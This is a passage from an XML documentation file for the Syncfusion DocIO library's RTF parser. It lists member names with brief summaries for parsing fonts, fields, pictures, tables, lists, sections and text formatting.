        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfLexer.CurrRtfTokenType">
            <summary>
            Gets/Sets Rtf token type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfNavigator">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfNavigator.c_two">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfNavigator.EmfToWmfBitsFlags">
            <summary>
            Specifies the flags/options for the unmanaged call to the GDI+ method
            Metafile.EmfToWmfBits().
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseToken">
            <summary>
            Parse each token from the rtf
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.InitDefaultCompatibilityOptions">
            <summary>
            Initializes the default compatibility options.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AddFontTableEntry">
            <summary>
            Add font to the font table collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AddColorTableEntry">
            <summary>
            Add color to the color table
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AddStyleSheetEntry">
            <summary>
            Add styles to the style table collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsStylePresent(System.String,Syncfusion.DocIO.DLS.StyleType)">
            <summary>
            Check whether the style is present in the document
            </summary>
            <param name="styleName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseControlStart">
            <summary>
            Parse Control start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsNestedGroup">
            <summary>
            Gets whether the group is  a nested group
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseGroupStart">
            <summary>
            Parse group start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseGroupEnd">
            <summary>
            Parse Group End
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseGroupEndWithinFieldGroup">
            <summary>
            Parse group end within field group
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.EnsureFieldSubGroupEnd(Syncfusion.DocIO.DLS.Convertors.FieldGroupType)">
            <summary>
            Ensure whether the end of field sub group(field instruction and field end)
            </summary>
            <param name="groupStack"></param>
            <param name="fieldGroupType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.EnsureFieldGroupEnd">
            <summary>
            Ensure field group end
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.WriteFormFieldProperties">
            <summary>
            Write Form field properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.RemoveDelimiterSpace(System.String)">
            <summary>
            Remove Delimiter space from the document text
            </summary>
            <param name="token"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsPictureToken">
            <summary>
            Identify whether the token is a picture token
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseDocumentElement(System.String)">
            <summary>
            Parse document element
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseFieldGroupData(System.String)">
            <summary>
            Parse field group
            </summary>
            <param name="token"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseTOCField(System.String,Syncfusion.DocIO.FieldType)">
            <summary>
            Parse TOC field
            </summary>
            <param name="token"></param>
            <param name="fieldType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseUnknownField(System.String,Syncfusion.DocIO.FieldType)">
            <summary>
            Parse unknown field
            </summary>
            <param name="token"></param>
            <param name="fieldType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AppendTextRange(System.String)">
            <summary>
            Append Textrange
            </summary>
            <param name="token"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ReplaceWfieldWithWMergeFieldObject">
            <summary>
            Replace Wfield object with WMergeField object
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyFieldProperties(Syncfusion.DocIO.DLS.WField,System.String,Syncfusion.DocIO.FieldType)">
            <summary>
            Apply field properties
            </summary>
            <param name="field"></param>
            <param name="token"></param>
            <param name="fieldType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseFormFieldDestinationWords(System.String)">
            <summary>
            Parse the form fields destination control words
            </summary>
            <param name="token"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseImageBytes">
            <summary>
            Parse Image bytes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseCustomDocumentProperties(System.String)">
            <summary>
            Parse custom document properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseBuiltInDocumentProperties(System.String)">
            <summary>
            Parse built-in document properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetFieldType(System.String)">
            <summary>
            Gets the field type
            </summary>
            <param name="fieldInstruction"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetFormattingString(System.String,System.String)">
            <summary>
            Get the formatting string 
            </summary>
            <param name="fieldInstruction"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyDropDownFormFieldProperties(Syncfusion.DocIO.DLS.WDropDownFormField)">
            <summary>
            Apply the drop down field specific properties
            </summary>
            <param name="dropDownFormField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyTextFormFieldProperties(Syncfusion.DocIO.DLS.WTextFormField)">
            <summary>
            Apply the textform field specific properties
            </summary>
            <param name="textField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyCheckboxPorperties(Syncfusion.DocIO.DLS.WCheckBox)">
            <summary>
            Apply the checkbox specific properties
            </summary>
            <param name="checkbox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyFormFieldProperties(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Apply the common formfield properties
            </summary>
            <param name="formField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsSupportedPicture">
            <summary>
            Check whether the current picture/shape need to be skipped or added
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AppendPictureToParagraph(System.String)">
            <summary>
            Append Picture to the current paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetImageByteArray(System.String)">
            <summary>
            Get Image bytes from the token
            </summary>
            <param name="token"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyPictureFormatting(Syncfusion.DocIO.DLS.IWPicture,Syncfusion.DocIO.DLS.Convertors.RtfParser.PictureFormat)">
            <summary>
            Apply picture Formatting
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopyParagraphFormatting(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Copy paragraph formatting
            </summary>
            <param name="sourceParaFormat"></param>
            <param name="destParaFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopyTabsCollection(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Copy Tabs Collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseControlWords(System.String,System.String,System.String,System.String)">
            <summary>
            Parse control word from the rtf file
            </summary>
            <param name="token"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SkipGroup">
            <summary>
            Skip the group.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseListTable(System.String,System.String,System.String,System.String)">
            <summary>
            Parse list table
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParselistLevelStart">
            <summary>
            Parse list level start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopyCharacterFormatting(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Copy Character formatting
            </summary>
            <param name="destFormat"></param>
            <param name="sourceFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopyListStyle(Syncfusion.DocIO.DLS.ListStyle,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Copy base list style to overrided list style
            </summary>
            <param name="sourceStyle"></param>
            <param name="destStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParsePageNumberingToken(System.String,System.String,System.String)">
            <summary>
            Parse pagenumbering of the section
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseLineNumberingToken(System.String,System.String,System.String)">
            <summary>
            Parse line numbering of the section
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseFontTable(System.String,System.String,System.String)">
            <summary>
            Parse font table
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseFormattingToken(System.String,System.String,System.String,System.String)">
            <summary>
            Parse Formatting controls
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ResetParagraphFormat(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Reset the paragraph formatting
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ResetBorders(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Reset Borders
            </summary>
            <param name="sourceParaFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ResetBorder(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Reset Border
            </summary>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ResetCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Reset the character format
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetEqualColumnWidth(System.Int32)">
            <summary>
            Get equal column width of the section
            </summary>
            <param name="columnCount"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseSpecialCharacters(System.String)">
            <summary>
            Parse special characters
            </summary>
            <param name="token"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsAccentCharacterNeedToBeOmitted">
            <summary>
            Check whether the accent character need to be omitted
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetTextureStyle(System.Int32)">
            <summary>
            Get Texture style
            </summary>
            <param name="textureValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseListTextStart">
            <summary>
            Parse listtext start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseParagraphEnd">
            <summary>
            Parse paragraph end
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseParagraphStart">
            <summary>
            Parse paragraph start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseSectionStart">
            <summary>
            Parse section start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopySectionFormat(Syncfusion.DocIO.DLS.Convertors.RtfParser.SecionFormat,Syncfusion.DocIO.DLS.Convertors.RtfParser.SecionFormat)">
            <summary>
            Copy Section formatting
            </summary>
            <param name="sourceFormat"></param>
            <param name="destFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseRowStart">
            <summary>
            Parse row Start
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseRowEnd">
            <summary>
            Parse Row End
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseCellBoundary(System.String,System.String,System.String)">
            <summary>
            Parse Cell boundary
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetTextWrapAround(Syncfusion.DocIO.DLS.RowFormat.TablePositioning)">
            <summary>
            Gets the text wrap around.
            </summary>
            <param name="positioning">The positioning.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetAccentCharacter(System.String)">
            <summary>
            Parses Accented character
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetCodePage">
            <summary>
            Get the code page for the current Font character set 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsSingleByte">
            <summary>
            Determines whether current code page is single byte encoding.
            </summary>
            <returns>
              <c>true</c> if [is single byte]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetFontCharSet">
            <summary>
            Get Font Character Set
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsSupportedCodePage(System.Int32)">
            <summary>
            Determine Whether the code page is supported for Encoding
            </summary>
            <param name="codePage"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetSupportedCodePage(System.Int32)">
            <summary>
            Get the code page is supported for Encoding
            </summary>
            <param name="codePage"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SetDefaultValue(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Set the default value of the paragraph format
            </summary>
            <param name="wParagraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ProcessTableInfo">
            <summary>
            Process the table information based on the levels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.EnsureLowerTable(System.Int32)">
            <summary>
            Ensure the lower level tables
            </summary>
            <param name="level">Current paragraph level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.EnsureUpperTable(System.Int32)">
            <summary>
            Ensure the upper level tables
            </summary>
            <param name="level">Currentl paragraph level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyListFormatting(System.String,System.String,System.String,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Apply list formatting
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplySectionFormatting">
            <summary>
            Apply Section formatting
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParsePictureToken(System.String,System.String,System.String)">
            <summary>
            Parse picture token
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.GetIntValue(System.String)">
            <summary>
            Get Int Value
            </summary>
            <param name="tokenValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParsePageVerticalAlignment(System.String,System.String,System.String)">
            <summary>
            Parse Vertical alignment of the page
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseOutLineLevel(System.String,System.String,System.String)">
            <summary>
            Parse outline levels
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ParseParagraphBorders(System.String,System.String,System.String)">
            <summary>
            Parse Borders
            </summary>
            <param name="token"></param>
            <param name="tokenKey"></param>
            <param name="tokenValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyCellFormatting(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Appply cell formatting
            </summary>
            <param name="cell"></param>
            <param name="cellFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyRowFormatting(Syncfusion.DocIO.DLS.WTableRow,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Apply Row formatting
            </summary>
            <param name="row"></param>
            <param name="rowFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyBorder(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Apply cell border
            </summary>
            <param name="destBorder"></param>
            <param name="sourceBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AddNewParagraph(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Adds the new paragraph to the current section
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.UpdateTabsCollection(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Update Paragraph Tabs collection
            </summary>
            <param name="newParagraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.UpdateDeleteTabsCollection(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Update tabs with type as clear from BaseFormat to direct paragraph formatting
            </summary>
            <param name="paraFormat"></param>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.AddNewSection(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Add new section to the current document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ExtractTwipsValue(System.String)">
            <summary>
            Extract the Twips value from the token
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ExtractQuaterPointsValue(System.String)">
            <summary>
            Extract the Quater point value from the token
            </summary>
            <param name="nValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SortTabCollection">
            <summary>
            Sort Tab Collection based on Tab position
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SeperateToken(System.String)">
            <summary>
            Seperate Token keyword from the token Value
            </summary>
            <param name="token"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.CopyTextFormatToCharFormat(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat)">
            <summary>
            Copy Textformating to the character format
            </summary>
            <param name="charFormat"></param>
            <param name="textFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyParagraphFont(Syncfusion.DocIO.DLS.Convertors.RtfFont)">
            <summary>
            Apply font for the current paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ApplyColorTable(Syncfusion.DocIO.DLS.Convertors.RtfColor)">
            <summary>
            Apply font color for the current text
            </summary>
            <param name="rtfColor"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SetParsedElementFlag(System.String)">
            <summary>
            Sets the parsed element flag.
            </summary>
            <param name="token">The token.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.SetShapeElementsFlag(System.Int32)">
            <summary>
            Sets the shape elements flag.
            </summary>
            <param name="shapeTypeValue">The shape type value.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsStyleSheet">
            <summary>
            Gets/Sets the value indicating whether the stylesheet group is started.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.DefaultCodePage">
            <summary>
            Get's or set's the Default code page of the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.DefaultFontIndex">
            <summary>
            Get's or set's the Default font index value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsDestinationControlWord">
            <summary>
            Checks whether the control word is destination control word
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsFormFieldGroup">
            <summary>
            Gets whether the group is form field group
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.IsFieldGroup">
            <summary>
            Gets whether the group is field group
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrentLevel">
            <summary>
            Gets the current paragraph level
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.PreviousLevel">
            <summary>
            Gets the previous paragraph level
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrentTextBody">
            <summary>
            Gets the current TextBody
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrentPara">
            <summary>
            Gets the current para.
            </summary>
            <value>The current para.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrColumn">
            <summary>
            Gets and Sets the current column
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrentSection">
            <summary>
            Gets the current section
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrListStyle">
            <summary>
            Gets and sets the current list style
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrentComment">
            <summary>
            Gets the current comment.
            </summary>
            <value>The current comment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CommentStartIdList">
            <summary>
            Gets the comments id list.
            </summary>
            <value>The comments id list.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CommentLinkText">
            <summary>
            Holds the text which enclosed by the comment tags
            </summary>
            <value>The comments id list.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.Comments">
            <summary>
            Holds the collection of Comment along with its ID
            </summary>
            <value>The comments id list.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrListLevel">
            <summary>
            Gets and Sets the current list level
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrRtfFont">
            <summary>
            Gets and Sets the current Rtf font
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrColorTable">
            <summary>
            Gets and sets the current color table
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrTable">
            <summary>
            Gets and Sets the current table
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrRow">
            <summary>
            Gets and Sets the current row
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrCell">
            <summary>
            Gets and Sets the current cell
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrCellFormat">
            <summary>
            Gets and Sets the current cell format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrRowFormat">
            <summary>
            Gets/Sets the current row format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.CurrTabFormat">
            <summary>
            Gets/Sets the current tab format
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat">
            <summary>
            Text format class
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.m_position">
            <summary>
            Specifies Vertical position of the Character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.m_scaling">
            <summary>
            Specifies scaling percentage of the Character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.m_charcterSpacing">
            <summary>
            Specifies the character spacing of the text
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Bold">
            <summary>
            Specifies Bold format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Italic">
            <summary>
            Specifies Italic format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Underline">
            <summary>
            Specifies Underline format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Strike">
            <summary>
            Specifies Strike format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.DoubleStrike">
            <summary>
            Specifies DoubleStrike format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Emboss">
            <summary>
            Specifies Emboss format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Engrave">
            <summary>
            Specifies Engrave format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.SubSuperScript">
            <summary>
            Specifies SubSuperscript Format
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.FontColor">
            <summary>
            Specifies font color of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.BackColor">
            <summary>
            Specifies back color of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.ForeColor">
            <summary>
            Specifies fore color of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.m_highlightColor">
            <summary>
            Specifies Hightlight color of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.FontFamily">
            <summary>
            Specifies the font family.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.FontSize">
            <summary>
            Specifies the font size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.TextAlign">
            <summary>
            Specifies the text alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Style">
            <summary>
            Specifies the text style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.LocalIdASCII">
            <summary>
            Gets or sets the ASCII locale id .
            </summary>
            <value>The ASCII locale id .</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.LocalIdForEast">
            <summary>
            Gets or sets the far east locale id .
            </summary>
            <value>The far east locale id .</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.CharacterSpacing">
            <summary>
            character spacing of the text
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.LidBi">
            <summary>
            Gets or sets the complex script locale id .
            </summary>
            <value>The far east locale id .</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Position">
            <summary>
            Specifies Vertical position of the Character
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.Scaling">
            <summary>
            Specifies scaling percentage of the Character
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.TextFormat.HighlightColor">
            <summary>
            Specifies Highlight color of the Text
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.RtfParser.SecionFormat">
            <summary>
            Section Format class
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.SecionFormat.FirstPageTray">
            <summary>
            Gets/sets the bin in which the first page of the section will be printed
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.SecionFormat.OtherPagesTray">
            <summary>
            Gets/sets the bin in which the other pages of the section will be printed
